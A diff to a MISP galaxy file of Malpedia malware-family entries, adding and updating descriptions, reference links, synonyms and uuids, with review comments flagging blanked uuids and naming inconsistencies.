@@ -13118,11 +15029,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan", + "https://www.sangfor.com/source/blog-network-security/1094.html", "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", + "https://cyware.com/news/new-satan-ransomware-variant-lucky-exposes-10-server-side-vulnerabilities-070afbd2", "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", - "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html" + "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html", + "http://blog.nsfocusglobal.com/categories/trend-analysis/satan-variant-analysis-handling-guide/", + "https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/" + ], + "synonyms": [ + "DBGer", + "Lucky Ransomware" ], - "synonyms": [], "type": [] }, "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91", @@ -13159,7 +15077,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos", - "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", + "https://securitykitten.github.io/2016/11/15/scanpos.html", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware" ], "synonyms": [], 
@@ -13322,6 +15240,40 @@ "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5", "value": "Serpico" }, + { + "description": "ServHelper is written in Delphi and according to ProofPoint best classified as a backdoor.\r\n\r\nProofPoint noticed two distinct variant - \"tunnel\" and \"downloader\" (citation):\r\n\"The 'tunnel' variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to 'hijack' legitimate user accounts or their web browser profiles and use them as they see fit. The 'downloader' variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader.\"\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper", + "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf", + "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/", + "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/", + "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cebfa7af-8c31-4dda-8373-82893c7f43f4", + "value": "ServHelper" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer", + "https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/", + "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/", + 
"https://securelist.com/operation-shadowhammer/89992/", + "https://blog.reversinglabs.com/blog/forging-the-shadowhammer", + "https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "51728278-a95c-45a5-9ae0-9897d41d0efb", + "value": "shadowhammer" + }, { "description": "", "meta": { @@ -13436,6 +15388,19 @@ "uuid": "67fc358f-da6a-4f01-be23-44bc97319127", "value": "Shim RAT" }, + { + "description": "SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps.\r\n\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "07470989-faac-44fb-b505-1d5568b3c716", + "value": "SHIPSHAPE" + }, { "description": "", "meta": { @@ -13531,8 +15496,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", "http://www.intezer.com/silenceofthemoles/", + "https://www.group-ib.com/resources/threat-research/silence.html", "https://securelist.com/the-silence/83009/", - "https://www.group-ib.com/resources/threat-research/silence.html" + "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/" ], "synonyms": [ "TrueBot" @@ -13672,6 +15638,19 @@ "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", "value": "Slingshot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.slub", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1bc01fca-9a1e-4669-bd9d-8dd29416f9c1", + "value": "SLUB" + }, { "description": "", "meta": { 
@@ -13906,7 +15885,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", "https://attack.mitre.org/wiki/Software/S0157", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/", + "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx" ], "synonyms": [ "denis" @@ -13916,6 +15897,19 @@ "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c", "value": "SOUNDBITE" }, + { + "description": "SPACESHIP searches for files with a specified set of file extensions and copies them to\r\na removable drive. FireEye believes that SHIPSHAPE is used to copy SPACESHIP to a removable drive,\r\nwhich could be used to infect another victim computer, including an air-gapped computer. SPACESHIP is\r\nthen used to steal documents from the air-gapped system, copying them to a removable drive inserted\r\ninto the SPACESHIP-infected system", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "813e2761-6d68-493f-846b-2fc86d2e8079", + "value": "SPACESHIP" + }, { "description": "", "meta": { @@ -13968,7 +15962,7 @@ "synonyms": [], "type": [] }, - "uuid": "552745f4-6702-47a5-b517-9b099937573f", + "uuid": "", "value": "win.spynet_rat" }, { @@ -13989,7 +15983,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], 
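Review bot: The `win.spynet_rat` hunk replaces the entry's uuid `552745f4-6702-47a5-b517-9b099937573f` with an empty string, which looks like an accidental edit rather than an intended change: the uuid is the stable identifier MISP uses to reference, deduplicate and synchronise cluster values across instances, so a blank value breaks every existing reference to this entry and would collide with any other entry that ends up with an empty uuid. Restore `"uuid": "552745f4-6702-47a5-b517-9b099937573f"`, or remove the entry outright if it is being retired, rather than blanking the key. Running the galaxy validation script after this commit would catch this, since it checks that every value carries a unique uuid.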
@@ -14065,6 +16059,34 @@ "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a", "value": "StarsyPound" }, + { + "description": "Potentially unwanted program that changes the startpage of browsers to induce ad impressions.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.startpage", + "https://www.bleepingcomputer.com/virus-removal/remove-search-searchetan.com-chrome-new-tab-page" + ], + "synonyms": [ + "Easy Television Access Now" + ], + "type": [] + }, + "uuid": "033dbef5-eb51-4f7b-87e6-6dc4bef72841", + "value": "StartPage" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker", + "https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d1c5a299-c072-44b5-be31-d03853bca5ea", + "value": "StealthWorker Go" + }, { "description": "", "meta": { @@ -14090,6 +16112,23 @@ "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a", "value": "Stinger" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stop", + "https://securelist.com/keypass-ransomware/87412/", + "https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/" + ], + "synonyms": [ + "Djvu", + "KeyPass" + ], + "type": [] + }, + "uuid": "447e5d7d-dd23-43b3-8cbc-b835498a49dd", + "value": "STOP Ransomware" + }, { "description": "", "meta": { @@ -14139,7 +16178,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet", - "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html" + "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html", + "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf" ], "synonyms": [], "type": [] 
@@ -14165,9 +16205,16 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox", + "https://www.symantec.com/connect/blogs/trojanbayrob-strikes-again-1", + "https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf", + "https://www.justice.gov/opa/pr/two-romanian-cybercriminals-convicted-all-21-counts-relating-infecting-over-400000-victim", + "https://www.symantec.com/connect/blogs/bayrob-three-suspects-extradited-face-charges-us" + ], + "synonyms": [ + "Bayrob", + "Nivdort" ], - "synonyms": [], "type": [] }, "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd", @@ -14273,7 +16320,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], @@ -14372,7 +16419,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor", "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", - "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html" + "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html", + "https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1" ], "synonyms": [ "simbot" 
@@ -14460,6 +16508,34 @@ "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", "value": "TDTESS" }, + { + "description": "Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the popular remote access and desktop sharing software, to gain full control of the infected computer.\r\nThis is achieved by sideloading another DLL among the legit TeamViewer.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.teambot", + "https://research.checkpoint.com/finteam-trojanized-teamviewer-against-government-targets/" + ], + "synonyms": [ + "FINTEAM" + ], + "type": [] + }, + "uuid": "045469d0-5bb2-4ed9-9ee2-a0a08f437433", + "value": "TeamBot" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tefosteal", + "https://twitter.com/WDSecurity/status/1105990738993504256" + ], + "synonyms": [], + "type": [] + }, + "uuid": "aaa05037-aee1-4353-ace1-43ae0f558091", + "value": "TefoSteal" + }, { "description": "", "meta": { @@ -14517,6 +16593,20 @@ "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9", "value": "Terminator RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.termite", + "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", + "https://www.alienvault.com/blogs/labs-research/internet-of-termites" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c0801a29-ecc4-449b-9a1b-9d2dbde1995d", + "value": "Termite" + }, { "description": "", "meta": { 
@@ -14662,6 +16752,21 @@ "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144", "value": "TinyLoader" }, + { + "description": "TinyMet is a meterpreter stager.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet", + "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/" + ], + "synonyms": [ + "TiniMet" + ], + "type": [] + }, + "uuid": "075c6fa0-e670-4fe1-be8b-b8b13714cb58", + "value": "TinyMet" + }, { "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor.", "meta": { 
@@ -14791,33 +16896,40 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot", + "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", - "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", + "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/", "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module", "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", + "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html", "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", "https://www.youtube.com/watch?v=KMcSAlS9zGE", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/", "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", + 
"https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", - "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", + "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", + "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html", "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", - "http://www.malware-traffic-analysis.net/2018/02/01/", + "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", - "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", + "http://www.malware-traffic-analysis.net/2018/02/01/", + "https://www.cert.pl/en/news/single/detricking-trickbot-loader/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features", 
"https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", @@ -14847,11 +16959,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton", - "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", + "https://dragos.com/blog/trisis/TRISIS-01.pdf", + "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN", - "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", - "https://dragos.com/blog/trisis/TRISIS-01.pdf" + "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", + "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf" ], "synonyms": [ "HatMan", @@ -14868,7 +16981,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat", "https://github.com/5loyd/trochilus/", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", + "https://asert.arbornetworks.com/uncovering-the-seven-pointed-dagger/", + "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" ], "synonyms": [], 
@@ -14883,7 +16997,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh", "https://securelist.com/the-shade-encryptor-a-double-threat/72087/", - "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/" + "https://www.welivesecurity.com/2019/01/28/russia-hit-new-wave-ransomware-spam/", + "https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/", + "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/", + "https://support.kaspersky.com/13059" ], "synonyms": [ "Shade" @@ -14922,7 +17039,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" ], "synonyms": [], "type": [] @@ -14972,6 +17090,22 @@ "uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc", "value": "UDPoS" }, + { + "description": "Information stealer.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ufrstealer", + "https://twitter.com/malwrhunterteam/status/1096363455769202688", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Usteal" + ], + "synonyms": [ + "Usteal" + ], + "type": [] + }, + "uuid": "a24bf6d9-e177-44f2-9e61-8cf3566e45eb", + "value": "UFR Stealer" + }, { "description": "", "meta": { @@ -15018,7 +17152,7 @@ "synonyms": [], "type": [] }, - "uuid": "ff80f82d-2556-4cda-8cf2-aa6b21d59dc9", + "uuid": "", "value": "win.unidentified_005" }, { 
@@ -15171,18 +17305,6 @@ "uuid": "799921d7-48e8-47a6-989e-487b527af37a", "value": "Unidentified 032" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_033" - ], - "synonyms": [], - "type": [] - }, - "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", - "value": "Unidentified 033" - }, { "description": "", "meta": { @@ -15280,19 +17402,6 @@ "uuid": "4cb8235a-7e70-4fad-9244-69215750d559", "value": "Unidentified 045" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_046", - "https://twitter.com/DrunkBinary/status/1006534471687004160" - ], - "synonyms": [], - "type": [] - }, - "uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f", - "value": "Unidentified 046" - }, { "description": "RAT written in Delphi used by Patchwork APT.", "meta": { @@ -15306,19 +17415,6 @@ "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2", "value": "Unidentified 047" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_048", - "https://twitter.com/DrunkBinary/status/1002587521073721346" - ], - "synonyms": [], - "type": [] - }, - "uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f", - "value": "Unidentified 048 (Lazarus?)" - }, { "description": "", "meta": { 
@@ -15370,6 +17466,47 @@ "uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233", "value": "Unidentified 053 (Wonknu?)" }, + { + "description": "Unnamed downloader for win.wscspl as described in the 360ti blog post.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_055", + "https://www.freebuf.com/articles/database/192726.html", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b001ebb7-5d33-4972-96cc-56f9549dff27", + "value": "Unidentified 055" + }, + { + "description": "Unnamed portscanner as used in the Australian Parliament Hack (Feb 2019).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_057", + "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1b8e86ab-57b2-4cd9-a768-a7118b4eb4be", + "value": "Unidentified 057" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_058", + "https://securelist.com/the-evolution-of-brazilian-malware/74325/#rat", + "https://securelist.com/the-return-of-the-bom/90065/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bab52335-be9e-4fad-b68e-f124b0d69bbc", + "value": "Unidentified 058" + }, { "description": "", "meta": { 
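Review bot: The Unidentified 055 description names its payload by Malpedia's internal slug `win.wscspl` instead of the cluster value `WSCSPL` that this same commit adds on L144, which is the name a galaxy user will actually search for; `"description": "Unnamed downloader for WSCSPL as described in the 360ti blog post.",` reads correctly without the slug. The 360ti reference is also listed here without a trailing slash and in the WSCSPL entry with one, so a URL-based de-duplication of refs will treat them as different sources. Picking one form (the WSCSPL spelling with the trailing slash is the one the site redirects to, I believe, but that is an inference) keeps the two entries consistent.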
@@ -15438,8 +17575,10 @@ "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/", + "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features", "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/", "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", + "http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/", "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/" ], "synonyms": [ @@ -15456,8 +17595,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken", "https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation", + "https://www.circl.lu/pub/tr-25/", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3193&sid=9fe4a57263c91a8b18bc43ae23afc453", "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence", 
@@ -15478,11 +17619,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak", + "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", + "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/", "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", - "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", - "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", - "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" + "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" ], "synonyms": [ "Catch", @@ -15494,6 +17636,22 @@ "uuid": "b662c253-5c87-4ae6-a30e-541db0845f67", "value": "Vawtrak" }, + { + "description": "Delphi-based ransomware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vegalocker", + "https://twitter.com/malwrhunterteam/status/1095024267459284992", + "https://twitter.com/malwrhunterteam/status/1093136163836174339" + ], + "synonyms": [ + "Vega" + ], + "type": [] + }, + "uuid": "704bb00f-f558-4568-824c-847523700043", + "value": "VegaLocker" + }, { "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. ", "meta": { @@ -15526,7 +17684,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", - "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", + "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html" ], "synonyms": [], "type": [] 
@@ -15547,6 +17706,21 @@ "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", "value": "Vflooder" }, + { + "description": "Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar", + "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", + "https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html", + "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1f44c08a-b427-4496-9d6d-909b6bf34b9b", + "value": "vidar" + }, { "description": "", "meta": { @@ -15565,8 +17739,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut", + "https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/", + "https://chrisdietri.ch/post/virut-resurrects/", + "https://www.secureworks.com/research/virut-encryption-analysis", "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/", - "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/" + "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/", + "https://www.spamhaus.org/news/article/690/cooperative-efforts-to-shut-down-virut-botnet", + "https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/" ], "synonyms": [], "type": [] 
